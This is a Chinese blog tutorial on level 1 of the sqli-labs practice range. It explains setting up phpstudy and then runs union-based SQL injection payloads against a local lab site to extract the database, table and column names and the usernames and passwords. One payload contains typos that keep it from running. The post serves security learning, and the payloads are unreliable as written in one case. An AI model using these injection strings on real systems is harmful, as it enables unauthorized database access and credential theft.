sqli-labs level1

最新推荐文章于 2023-04-10 16:09:30 发布
最新推荐文章于 2023-04-10 16:09:30 发布
阅读量215 收藏
点赞数
分类专栏: sqli-lab 靶场自学分享 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43436666/article/details/119279060
版权

  1. 环境准备:*

    1.1、安装phpstudy软件,网址如下,安装后如下图1.1

https://www.xp.cn/

在这里插入图片描述

1.2、下载sqli-lab的压缩文件包,压缩后放在phpstudy的www文件夹内(若不知道路径的可以在phpstudy下的网站一栏中选择,则可以看到文件的绝对路径)
1.3、打开网站,按照首页提示初始化靶场(这里注意在phpstudy中将php版本号调至php5左右,网站->管理->php版本)
1.4、安装完成后,即可使用sqli-lab靶场了

2.level1
1、打开sqli靶场
在这里插入图片描述2、此时我们可以进行sql注入的尝试

http://127.0.0.1/sqli-labs-master/Less-1/id=1

报错如下:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1

我们知道正常情况下该语句应该为

select * from ... where id=1

那么我们可以用联合查询的方式来查询一下数据库名

?id=-1' union select 1,2,database() --+

在这里插入图片描述

注:之所以最后要加–+是因为–在sql语句中表示注释,同时+代表空格,而注释后一定有空格才可以成立,不然会报错

继续进行sql注入,这回通过构建语句来查询表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

在这里插入图片描述原理跟之前几乎完全一样,不一样的是这回我们爆的是user这个表里的字段

?id=-1' union select 1,2,group_concat(columns_name) from informatio_schema.tables 
where table_name='users'  --+

在这里插入图片描述
最后我们可以直接爆账户名和密码了

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

注:这里的0x3a是冒号:的十六进制表示,也可以用其他字符代替,仅用于隔开username和password

在这里插入图片描述

非楠
关注
专栏目录
靶场——sqli-lab 1-4
ad12456的博客
04-11 1534
sqli_lab
sqlmap使用教程(sqli-labs1-10详解)
小同的博客
05-22 4673
-u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请
Sqli Lab(1)
Keo的博客
01-17 161
搭建环境用的是phpstudy,跟着readme一步步安装,在reset的时候注意php版本 因为php7不支持mysql_函数,统统改用mysqli所以记得在phpstudy中间切换版本
sqli-lab 1-10关解析
Oranges.的博客
09-05 513
sqli-lab 1-10关题解
sqli-lab1到4关详解
cangyu51462的博客
04-12 475
sqli-lab 1-4
sqli-lab 1-16通关随笔记
m0_52361291的博客
06-08 332
前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍 由于是直接刷关所以只是让关卡报出注入点其余的都没搞。首先明确SQL注入产生的原理是传递结构化语言时影响了数据库的执行叫做SQL注入。这些关卡都是统一的get型注入而且都是通过联合查询的 代码中通过mysql_query()和mysql_fetch_array()这两个函数先执行查询语句然后再将同一行的数据以数组形式输出,调用数据库列名称来呈现查询结果而mysql_error()这个函数的作用是输出mysql数据库报错的信息这也是做联合查询时的一个
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3106
sqli-labs靶场过关 源码分析
sqli-labs.7z
08-29
SQL注入实验室(sqli-labs):网络安全与信息安全实践》 SQL注入(SQL Injection)是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意的SQL语句,以获取未经授权的数据访问或对数据库进行非法操作。sqli-...
sqlmap使用教程(sqli-labs11-20)
小同的博客
05-22 789
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
sqlmap过SQLi-LABS靶场 1-10关
小明师傅博客
06-04 8350
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqli-lab(1-10)及函数扩充
quan9i的博客
12-05 929
文章目录常用函数扩充sql-lab1-4获取字段数获取数据库名获取表名获取字段信息sql-lab 5-7获取字段数获取数据库sql-lib 8-10 常用函数扩充 下面部分函数之前已扩充,点击此处查看 在此继续扩充一些需要用到的函数 1、left()函数 解释:left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0 示例如下 代码:left(database(),1)=’s’ 结果如下 2、regexp函数 解释:user的结果是root(我的账号为root),regexp为匹配root的正则
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 955
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)一键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3946
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli注入(1)数据库相关知识
c10udz的博客
04-11 739
目录 1.MySQL命令行打开方式 2.MySQL函数 1.MySQL命令行打开方式 前提条件:已经在PHPstudy(2018)上面搭好了sqli-labs靶场。 (1)打开PHP study,找到【其他选项菜单】、【MySQL工具】、【MySQL命令行】,然后输入数据库登录密码即可。 (2)在文件夹找到\phpStudy\PHPTutorial\MySQL\bin目录,使用windows命令进入bin中,输入cmd.exe -mysql -u root -p;(提示结尾有分号),
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
SQL注入—Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8394
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
qq_52364123的博客
04-10 1万+
sql注入集合
sqlilabs1-20详细教程
黑白的博客
10-06 8269
声明 学习SQL注入 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
sqli-labs环境搭建
小橙子的博客
03-15 5635
1、本地下载phpstudy,下载地址如下: https://www.xp.cn/download.html 安装完成后界面如下。 2、下载sqli-labs源码 https://github.com/Audi-1/sqli-labs 3、把下载好的文件放到phpstudy安装的www目录下。如本例 4、配置数据库 打开D:\phpstudy_pro\WWW\sqli-labs-master\sql-connections\db-creds.inc 把密码设置为root 5..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值